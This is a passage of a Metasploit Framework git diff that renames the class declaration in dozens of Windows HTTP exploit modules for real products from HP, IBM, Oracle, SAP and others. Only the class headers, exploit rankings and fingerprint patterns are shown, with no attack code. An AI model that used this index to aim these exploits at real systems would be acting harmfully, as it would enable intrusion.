b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb index 3272545d69..40eb5cab67 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index 017a1e6a28..db9a37d637 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb +++ b/modules/exploits/windows/http/hp_power_manager_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_power_manager_login.rb b/modules/exploits/windows/http/hp_power_manager_login.rb index 150945f97e..3215be533a 100644 --- a/modules/exploits/windows/http/hp_power_manager_login.rb +++ b/modules/exploits/windows/http/hp_power_manager_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb index 14c184703d..a221aebd55 100644 --- a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb +++ b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb index c37689db26..9310991d96 100644 --- a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb +++ b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index 80f56f1d92..d6802c853e 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb @@ -19,7 +19,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /httpdx\/.* \(Win32\)/ ] } diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index 488f09f6ad..bb0bf66cdc 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ia_webmail.rb b/modules/exploits/windows/http/ia_webmail.rb index 7392d5b5dd..d20b2d65ea 100644 --- a/modules/exploits/windows/http/ia_webmail.rb +++ b/modules/exploits/windows/http/ia_webmail.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb index c02d083972..7ce4a44b51 100644 --- a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb +++ b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index 379820d58b..fba7ae256a 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tsm_cad_header.rb b/modules/exploits/windows/http/ibm_tsm_cad_header.rb index 72df9d21b0..b7e738d5b4 100644 --- a/modules/exploits/windows/http/ibm_tsm_cad_header.rb +++ b/modules/exploits/windows/http/ibm_tsm_cad_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index 144fb4bb7f..eab3afafdd 100644 --- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb index 88c2281837..1b8962d096 100644 --- a/modules/exploits/windows/http/integard_password_bof.rb +++ b/modules/exploits/windows/http/integard_password_bof.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # stack bof, seh, universal ret, auto targeting include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/intersystems_cache.rb b/modules/exploits/windows/http/intersystems_cache.rb index 7ae04dd3ed..6cec7edfd1 100644 --- a/modules/exploits/windows/http/intersystems_cache.rb +++ b/modules/exploits/windows/http/intersystems_cache.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # XXX: Needs custom body check HttpFingerprint = { :uri => '/csp/sys/mgr/UtilConfigHome.csp', :body => [ /Cache for Windows/ ] } diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb index 43e5794c4c..936bfb0e44 100644 --- a/modules/exploits/windows/http/intrasrv_bof.rb +++ b/modules/exploits/windows/http/intrasrv_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb index a0caa62e6e..c5ce138480 100644 --- a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb +++ b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm="WhatsUp Gold" ) diff --git a/modules/exploits/windows/http/jira_collector_traversal.rb b/modules/exploits/windows/http/jira_collector_traversal.rb index 91259f8dc0..1fcd7c1d38 100644 --- a/modules/exploits/windows/http/jira_collector_traversal.rb +++ b/modules/exploits/windows/http/jira_collector_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/kaseya_uploader.rb b/modules/exploits/windows/http/kaseya_uploader.rb index 4c4aa992ae..a481ff4676 100644 --- a/modules/exploits/windows/http/kaseya_uploader.rb +++ b/modules/exploits/windows/http/kaseya_uploader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb index 48b77af609..ab0204bfc9 100644 --- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb +++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/kolibri_http.rb b/modules/exploits/windows/http/kolibri_http.rb index 099e0dbc51..afd75aa97d 100644 --- a/modules/exploits/windows/http/kolibri_http.rb +++ b/modules/exploits/windows/http/kolibri_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /kolibri-2\.0/ ] } diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb index f4eaebfb4e..bac17e0e49 100644 --- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb +++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb index 6ba0f7ca7a..39c4b04f60 100644 --- a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb +++ b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 8bc3b959d3..83fd3da795 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /MailEnable/ ] } diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb index e2b4c84644..18ae25b9b5 100644 --- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb +++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote # It removes large object in database, shoudn't be a problem, but just in case.... Rank = ManualRanking diff --git a/modules/exploits/windows/http/manageengine_apps_mngr.rb b/modules/exploits/windows/http/manageengine_apps_mngr.rb index cf33a6b8da..e017dd250a 100644 --- a/modules/exploits/windows/http/manageengine_apps_mngr.rb +++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/manageengine_connectionid_write.rb b/modules/exploits/windows/http/manageengine_connectionid_write.rb index 84b93b9293..e69b65abee 100644 --- a/modules/exploits/windows/http/manageengine_connectionid_write.rb +++ b/modules/exploits/windows/http/manageengine_connectionid_write.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index e4756c66e3..1764bf01ea 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb index 05afc25499..4488698868 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index 3cb4379108..5a33167929 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -5,7 +5,7 @@ -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb index bf4a35bb75..3f17071de0 100644 --- a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb +++ b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/minishare_get_overflow.rb b/modules/exploits/windows/http/minishare_get_overflow.rb index f2213521aa..f02594d536 100644 --- a/modules/exploits/windows/http/minishare_get_overflow.rb +++ b/modules/exploits/windows/http/minishare_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/miniweb_upload_wbem.rb b/modules/exploits/windows/http/miniweb_upload_wbem.rb index b3dfd840ee..9fe3d101c1 100644 --- a/modules/exploits/windows/http/miniweb_upload_wbem.rb +++ b/modules/exploits/windows/http/miniweb_upload_wbem.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /MiniWeb/ ] } diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb index e182045464..d9c46a3d2a 100644 --- a/modules/exploits/windows/http/navicopa_get_overflow.rb +++ b/modules/exploits/windows/http/navicopa_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /InterVations/ ] } diff --git a/modules/exploits/windows/http/netdecision_http_bof.rb b/modules/exploits/windows/http/netdecision_http_bof.rb index b4ea62acaf..b897f791b1 100644 --- a/modules/exploits/windows/http/netdecision_http_bof.rb +++ b/modules/exploits/windows/http/netdecision_http_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/novell_imanager_upload.rb b/modules/exploits/windows/http/novell_imanager_upload.rb index 050ab91927..466ddbbae6 100644 --- a/modules/exploits/windows/http/novell_imanager_upload.rb +++ b/modules/exploits/windows/http/novell_imanager_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/novell_mdm_lfi.rb b/modules/exploits/windows/http/novell_mdm_lfi.rb index a3a138768a..b70727e917 100644 --- a/modules/exploits/windows/http/novell_mdm_lfi.rb +++ b/modules/exploits/windows/http/novell_mdm_lfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index a5308b4219..d52305bdb8 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/nowsms.rb b/modules/exploits/windows/http/nowsms.rb index 5a93fa9feb..05f4c9ecb3 100644 --- a/modules/exploits/windows/http/nowsms.rb +++ b/modules/exploits/windows/http/nowsms.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index c2687a0f54..06b563e0cf 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/oracle_beehive_evaluation.rb b/modules/exploits/windows/http/oracle_beehive_evaluation.rb index 0f162ff621..19dbbe04ce 100644 --- a/modules/exploits/windows/http/oracle_beehive_evaluation.rb +++ b/modules/exploits/windows/http/oracle_beehive_evaluation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb index f237938d88..12a2318607 100644 --- a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb +++ b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index 6011d242f3..7980ec25ae 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb index cd011b2a62..3e8ce2702c 100644 --- a/modules/exploits/windows/http/oracle_endeca_exec.rb +++ b/modules/exploits/windows/http/oracle_endeca_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_event_processing_upload.rb b/modules/exploits/windows/http/oracle_event_processing_upload.rb index 3694398dc4..853c55c046 100644 --- a/modules/exploits/windows/http/oracle_event_processing_upload.rb +++ b/modules/exploits/windows/http/oracle_event_processing_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index 99bf3bc8d8..e8f3f218c1 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index 866adf8792..6d1632f045 100644 --- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/php_apache_request_headers_bof.rb b/modules/exploits/windows/http/php_apache_request_headers_bof.rb index a588859cc5..4b7e9feccf 100644 --- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb +++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/privatewire_gateway.rb b/modules/exploits/windows/http/privatewire_gateway.rb index a5b094110f..3671981570 100644 --- a/modules/exploits/windows/http/privatewire_gateway.rb +++ b/modules/exploits/windows/http/privatewire_gateway.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index d57e3d5b4f..9c50701f47 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb @@ -5,7 +5,7 @@ -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/rabidhamster_r4_log.rb b/modules/exploits/windows/http/rabidhamster_r4_log.rb index 62d385169f..d63fe48e99 100644 --- a/modules/exploits/windows/http/rabidhamster_r4_log.rb +++ b/modules/exploits/windows/http/rabidhamster_r4_log.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/rejetto_hfs_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb index 7305cbf62a..41cbf1fae9 100644 --- a/modules/exploits/windows/http/rejetto_hfs_exec.rb +++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sambar6_search_results.rb b/modules/exploits/windows/http/sambar6_search_results.rb index 480c346c9a..e4b0a0e1ed 100644 --- a/modules/exploits/windows/http/sambar6_search_results.rb +++ b/modules/exploits/windows/http/sambar6_search_results.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb index 338e61def3..0ef0bb0f34 100644 --- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb +++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit +class Metasploit3 < Msf::Exploit Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb index f3aa5c8d78..06dc9a7abb 100644 --- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb +++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sapdb_webtools.rb b/modules/exploits/windows/http/sapdb_webtools.rb index 24b366812d..67ed566e16 100644 --- a/modules/exploits/windows/http/sapdb_webtools.rb +++ b/modules/exploits/windows/http/sapdb_webtools.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /SAP-Internet-SapDb-Server\// ] } diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index 0535881db5..bf44556edd 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] } diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb index 70312715af..c4a78a8faa 100644 --- a/modules/exploits/windows/http/servu_session_cookie.rb +++ b/modules/exploits/windows/http/servu_session_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb index fd893c856e..aeb11ebc39 100644 --- a/modules/exploits/windows/http/shoutcast_format.rb +++ b/modules/exploits/windows/http/shoutcast_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/shttpd_post.rb b/modules/exploits/windows/http/shttpd_post.rb index d7f9f91c05..f3dbbe7725 100644 --- a/modules/exploits/windows/http/shttpd_post.rb +++ b/modules/exploits/windows/http/shttpd_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb index 961af5e2a4..5ba781def4 100644 --- a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb +++ b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb index 9afe16a3c4..ff35263e44 100644 --- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb +++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index db62b4f93d..4638454fcb 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff 